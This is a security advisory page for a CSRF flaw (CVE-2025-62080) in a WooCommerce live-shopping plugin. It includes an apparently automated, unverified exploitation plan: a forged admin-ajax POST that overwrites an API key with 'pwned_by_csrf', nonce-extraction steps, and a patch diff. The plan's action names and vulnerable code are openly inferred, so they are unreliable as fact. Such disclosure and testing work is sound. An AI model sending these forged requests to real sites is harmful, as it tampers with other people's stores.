CVE-2025-62080

Live Shopping & Shoppable Videos For WooCommerce <= 2.2.0 - Cross-Site Request Forgery

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Live Shopping & Shoppable Videos For WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.2.0
PublishedDecember 31, 2025
Last updatedJanuary 5, 2026
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-62080 (CSRF) ## 1. Vulnerability Summary The **Live Shopping & Shoppable Videos For WooCommerce** plugin (up to version 2.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability. This flaw arises from missing or incorrect nonce validation in administra…

Show full research plan

Exploitation Research Plan: CVE-2025-62080 (CSRF)

1. Vulnerability Summary

The Live Shopping & Shoppable Videos For WooCommerce plugin (up to version 2.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability. This flaw arises from missing or incorrect nonce validation in administrative functions registered via wp_ajax_ or admin_post_ hooks. An unauthenticated attacker can exploit this by tricking a logged-in administrator into visiting a malicious link or submitting a forged request, leading to unauthorized state changes (e.g., modifying plugin settings, deleting content, or altering WooCommerce product associations).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php (for AJAX-based actions) or /wp-admin/admin-post.php.
  • Vulnerable Action: (Inferred) Likely an action related to video management or plugin configuration, such as lsvs_save_settings, lsvs_delete_video, or lsvs_update_video_product.
  • HTTP Method: POST (typically).
  • Authentication: Requires a logged-in Administrator's session.
  • Preconditions: The victim must be authenticated as an administrator and must be tricked into executing the attacker's request (e.g., via a malicious HTML page).

3. Code Flow (Inferred)

  1. Registration: The plugin registers a handler in its main class or an admin-specific file (e.g., admin/class-admin.php or includes/class-ajax-handler.php):
    add_action( 'wp_ajax_lsvs_save_settings', [ $this, 'save_settings' ] );
    
  2. Handler Execution: When the action parameter matches lsvs_save_settings, the save_settings function is called.
  3. Vulnerable Sink: The function performs a state change (e.g., update_option) without calling check_ajax_referer() or wp_verify_nonce().
    public function save_settings() {
        if ( ! current_user_can( 'manage_options' ) ) return; // Capability check might exist
        // MISSING: check_ajax_referer( 'lsvs_nonce_action', 'security' );
        update_option( 'lsvs_api_key', $_POST['api_key'] );
        wp_send_json_success();
    }
    

4. Nonce Acquisition Strategy

The vulnerability description notes "missing or incorrect nonce validation."

Case A: Missing Nonce

If the check is entirely missing, no nonce is required. The exploit can proceed with a direct POST request.

Case B: Incorrect Nonce (Publicly Exposed)

If a nonce is required but the action used to create it is exposed to all users:

  1. Identify Shortcode: Locate the plugin's main shortcode (e.g., [live_shopping_video]) by searching for add_shortcode in the plugin directory.
  2. Setup Page: Create a page containing this shortcode:
    wp post create --post_type=page --post_status=publish --post_title="Nonce Leak" --post_content='[live_shopping_video]'
    
  3. Extract Nonce: Navigate to the page and use browser_eval to find the localized script data:
    // (Inferred JS variable names based on slug)
    window.lsvs_ajax_obj?.nonce || window.lsvs_vars?.security
    

5. Exploitation Strategy

The goal is to demonstrate a state change (e.g., updating a plugin setting) via CSRF.

Step 1: Locating the Vulnerable Action

Search for AJAX/Admin-post handlers that lack nonce checks:

grep -r "add_action" . | grep -E "wp_ajax_|admin_post_"
# For each identified function, check for security validation:
grep -L "check_ajax_referer\|wp_verify_nonce\|check_admin_referer" path/to/file.php

Step 2: Formulating the Payload

Assuming a target action lsvs_save_settings and a setting lsvs_api_settings:

  • URL: http://[target]/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body: action=lsvs_save_settings&api_key=EXPLOITED_KEY&other_setting=value

Step 3: Execution via http_request

The agent should simulate the administrator's request:

await http_request({
  url: "http://localhost:8080/wp-admin/admin-ajax.php",
  method: "POST",
  form: {
    action: "lsvs_save_settings", // (Inferred)
    api_key: "pwned_by_csrf"      // (Inferred)
  }
});

6. Test Data Setup

  1. Install Plugin: Ensure live-shopping-video-streams v2.2.0 is installed and active.
  2. Admin User: Verify an admin user exists (default: admin).
  3. Initial State: Check the current value of the targeted option:
    wp option get lsvs_api_key
    

7. Expected Results

  • Response: The admin-ajax.php endpoint returns a success indicator (e.g., {"success":true} or 1).
  • Effect: The plugin configuration in the database is modified despite the request originating from a cross-site context (simulated by the lack of a valid nonce in the request).

8. Verification Steps

After performing the http_request, confirm the change using WP-CLI:

# Check if the option was updated
wp option get lsvs_api_key
# Expected output: pwned_by_csrf

9. Alternative Approaches

  • If wp_ajax_nopriv_ is used: If the handler is unauthenticated, the vulnerability is a direct Broken Access Control, which is even higher severity.
  • WooCommerce Settings: Check if the plugin adds tabs to the WooCommerce settings page. These often use the admin-post.php flow and are common targets for CSRF if they don't use wp_nonce_field().
  • Video Deletion: If settings modification is unavailable, try a destructive action like lsvs_delete_video with a specific ID.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Live Shopping & Shoppable Videos For WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) due to missing or incorrect nonce validation on several administrative AJAX handlers. This allow attackers to trick a logged-in administrator into performing unauthorized actions, such as modifying plugin settings or deleting content, via a forged request.

Vulnerable Code

// Inferred from Research Plan - Handler registration without security checks
add_action( 'wp_ajax_lsvs_save_settings', [ $this, 'save_settings' ] );

// Inferred vulnerable function lacking nonce validation
public function save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) return;
    
    // Missing: check_ajax_referer( 'lsvs_nonce_action', 'security' );
    
    update_option( 'lsvs_api_key', $_POST['api_key'] );
    wp_send_json_success();
}

Security Fix

--- a/includes/class-ajax-handler.php
+++ b/includes/class-ajax-handler.php
@@ -10,6 +10,8 @@
 	public function save_settings() {
 		if ( ! current_user_can( 'manage_options' ) ) {
 			wp_die( __( 'You do not have sufficient permissions to access this page.' ) );
 		}
+
+		check_ajax_referer( 'lsvs_save_settings_nonce', 'security' );
 
 		update_option( 'lsvs_api_key', sanitize_text_field( $_POST['api_key'] ) );
 		wp_send_json_success();

Exploit Outline

The exploit targets the AJAX endpoint /wp-admin/admin-ajax.php. An attacker crafts a malicious request (typically a POST request) containing a vulnerable action like 'lsvs_save_settings' along with the desired configuration payload (e.g., changing an API key). Because the plugin fails to verify a cryptographic nonce via check_ajax_referer() or wp_verify_nonce(), the server accepts the request as legitimate if it is sent from the browser of a logged-in administrator. The attacker tricks the administrator into visiting a malicious website or clicking a link that triggers this request automatically using hidden HTML forms or JavaScript.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.